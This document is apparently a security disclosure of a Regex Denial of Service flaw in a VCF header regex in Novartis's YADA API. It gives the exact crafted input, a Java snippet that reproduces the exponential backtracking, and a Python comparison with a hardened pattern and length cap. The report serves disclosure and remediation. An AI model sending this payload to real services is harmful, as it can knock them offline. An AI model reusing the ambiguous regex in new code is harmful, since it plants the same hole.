YADA
Vulnerable Regular Expressions in YADA
Type of Issue: Potential Regex Denial of Service (ReDoS)
Description: The vulnerable regular expression is located in
https://github.com/Novartis/YADA/blob/1b12922c632b6b67d869b2a78f31512a252dd812/yada-api/src/main/java/com/novartis/opensource/yada/io/VCFHelper.java#L49
The regex can be exploited with the following string:
##INFO=<ID=ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="ID="!
You can execute the following code to reproduce the ReDoS:
import java.util.regex.Pattern;

// The pattern from VCFHelper.java: the repeated group ((...)=(\"?.*\"?))+ is ambiguous,
// so a non-matching input forces exponential backtracking before Pattern.matches() fails.
String pattern = "##(INFO|FILTER|FORMAT|ALT)=<((ID|Number|Type|Description)=(\"?.*\"?))+>";
String content = "##INFO=<ID=ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"ID=\"!";
long startTime = System.currentTimeMillis();
Pattern.matches(pattern, content); // full-string match; the trailing "!" guarantees failure
long endTime = System.currentTimeMillis();
System.out.println((endTime - startTime) + "ms"); // wall-clock time spent in the regex engine
I suggest limiting the input length, modifying the regex so it cannot backtrack exponentially, or replacing the regex with other parsing code.
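To show that recommendation in working form, the following is an added example (not YADA's code): it ports the reported regex unchanged to Python's `re`, whose backtracking engine behaves like java.util.regex on this pattern, and puts an unambiguous rewrite plus a length cap beside it. The `parse_header` helper, the 4096-character limit and the constructed sample lines are assumptions made for the illustration.

```python
import re
import time

# The vulnerable pattern quoted in the report, ported unchanged to Python's re (a
# backtracking engine like java.util.regex). The repeated group ((...)=("?.*"?))+ is
# ambiguous: every "ID=" can open a new repetition or be swallowed by ".*", so on
# input that cannot match ("!" where ">" belongs) the engine tries every split.
VULNERABLE = re.compile(r'##(INFO|FILTER|FORMAT|ALT)=<((ID|Number|Type|Description)=("?.*"?))+>')

# Hardened rewrite (added here, not the project's code). A value is either quoted
# and free of '"', or unquoted and free of ',', '>' and '"', so field boundaries
# are unambiguous and the engine has exactly one way to consume each character.
KEY = r'(?:ID|Number|Type|Description)'
VALUE = r'(?:"[^"]*"|[^,>"]*)'
FIELD = KEY + '=' + VALUE
HARDENED = re.compile(r'##(INFO|FILTER|FORMAT|ALT)=<(' + FIELD + '(?:,' + FIELD + ')*)>')
FIELD_CAP = re.compile('(' + KEY + ')=(' + VALUE + ')')  # walks the matched field list
MAX_HEADER_LINE = 4096  # second guard (assumed limit): reject oversized lines before any regex runs


def time_fullmatch(pattern, text):
    """Seconds spent in pattern.fullmatch(text), like the report's timing snippet."""
    start = time.perf_counter()
    pattern.fullmatch(text)
    return time.perf_counter() - start


def parse_header(line):
    """Parse one ##INFO/FILTER/FORMAT/ALT meta line into a dict; return None when
    the line is oversized or malformed. The vulnerable pattern is never used."""
    if len(line) > MAX_HEADER_LINE:
        return None
    m = HARDENED.fullmatch(line)
    if m is None:
        return None
    fields = {'kind': m.group(1)}
    for key, value in FIELD_CAP.findall(m.group(2)):
        fields[key] = value[1:-1] if value.startswith('"') else value
    return fields


def redos_input(repeats):
    """Constructed input shaped like the report's string: a run of ID=" that never closes."""
    return '##INFO=<ID=' + 'ID="' * repeats + '!'


if __name__ == '__main__':
    print(parse_header('##INFO=<ID=DP,Number=1,Type=Integer,Description="Total Depth">'))
    for n in (10, 12, 14, 16):  # cost grows exponentially with the number of repeats
        print(f'vulnerable, {n} repeats: {time_fullmatch(VULNERABLE, redos_input(n)):.3f}s')
    print(f'hardened, 40 repeats: {time_fullmatch(HARDENED, redos_input(40)):.6f}s')
```

The vulnerable timings are deliberately kept to short runs; the roughly 40-repeat string from the report would not finish in any useful time, while the hardened pattern rejects it immediately.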